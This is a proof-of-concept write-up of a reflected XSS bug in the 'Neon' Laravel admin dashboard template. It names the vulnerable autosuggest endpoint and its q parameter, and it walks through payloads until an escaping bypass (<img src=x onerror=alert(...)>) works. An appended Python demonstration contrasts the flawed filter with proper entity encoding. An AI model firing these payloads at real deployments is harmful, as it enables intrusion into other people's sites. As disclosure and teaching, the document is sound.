Neon is a feature-packed and powerful admin dashboard
with UI kit. It is built on the latest Bootstrap version, the latest Laravel
version, PHP, HTML5, CSS3 and jQuery. All elements are handcrafted with full
precision and are customizable as per requirements. The admin dashboard
is fully responsive and gives the developer full flexibility to
customize it. It consists of 3 unique dashboard layouts, 80+ inner pages
and 7+ modern icon sets. We are very supportive of our client base.
Please feel free to contact us in case of any query.
FULL POC :
/data/autosuggest-remote.php
Add a (q) parameter to this page.
EX : (http://localhost/neon/data/autosuggest-remote.php?q=hi)
The value of q is reflected back into the response, so this is where I get the XSS bug.
Let's try these payloads:
<script>alert(1)</script>
<img src="x" onerror="alert(1)">
The first one is not working.
The second one renders but is not executed... hmm, why?
Looking at the code of the page: the programmer adds a \ before every double quote and every /. So the closing </script> of the first payload arrives as <\/script> and is never parsed as a closing tag, and the second payload's onerror=\"alert(1)\" no longer contains valid JavaScript.
Hmm, let's bypass it with an img tag that uses no double quotes and no slashes:
<img src=x onerror=alert('@Knassar702')>BOOOM, worked :)
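To make the three attempts above concrete, here is an added example (my own code, not the post's and not from the Neon package) that models in Python the escaping the post describes: a backslash before every " and every /, nothing else touched. That filter is an assumption reconstructed from the write-up, and the reflect() wrapper element is a hypothetical placeholder. The block runs each payload through that filter and through proper entity encoding (the PHP equivalent being htmlspecialchars($q, ENT_QUOTES, 'UTF-8')) so you can see which payloads the backslash filter leaves intact and why entity encoding stops all three.

```python
import html

# Constructed input: the three payloads tried against ?q= in the write-up.
PAYLOADS = [
    "<script>alert(1)</script>",
    '<img src="x" onerror="alert(1)">',
    "<img src=x onerror=alert('@Knassar702')>",
]


def neon_style_escape(q: str) -> str:
    """Model of the filter described in the post (an assumption, not the vendor's code):
    a backslash is placed before every double quote and every forward slash and
    nothing else is touched. Single quotes, <, > and = pass through unchanged."""
    return q.replace('"', '\\"').replace("/", "\\/")


def safe_escape(q: str) -> str:
    """What the endpoint should do before echoing user input into an HTML body:
    entity-encode &, <, >, " and ' (PHP: htmlspecialchars($q, ENT_QUOTES, 'UTF-8'))."""
    return html.escape(q, quote=True)


def reflect(q: str, escaper) -> str:
    """Embed the escaped query into a response body the way an autosuggest page that
    echoes the search term would. The <p> wrapper is a hypothetical placeholder."""
    return f"<p>Results for: {escaper(q)}</p>"


def filter_is_noop(q: str, escaper=neon_style_escape) -> bool:
    """True when the escaper leaves the payload byte-for-byte intact, i.e. the payload
    contains none of the characters the filter looks for and reaches the browser as-is."""
    return escaper(q) == q


def tag_survives(q: str, escaper=neon_style_escape) -> bool:
    """True when a raw '<' from the input still reaches the response, meaning the browser
    will parse a tag out of it. The backslash filter never removes '<', which is why the
    second payload renders an <img> even though its onerror body is broken."""
    return "<" in escaper(q)


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"payload : {p}")
        print(f"  neon  : {neon_style_escape(p)}  untouched={filter_is_noop(p)}")
        print(f"  safe  : {safe_escape(p)}  tag_survives={tag_survives(p, safe_escape)}")
        print(f"  body  : {reflect(p, neon_style_escape)}")
```

Running it shows that the backslash filter is a no-op for the third payload only, and that every payload still carries a raw < through the filter, whereas entity encoding removes the < and both quote characters from all three. If the endpoint is meant to return suggestion data rather than HTML, the cleaner fix is to emit JSON with a Content-Type: application/json header so the browser never treats the reflected value as markup at all.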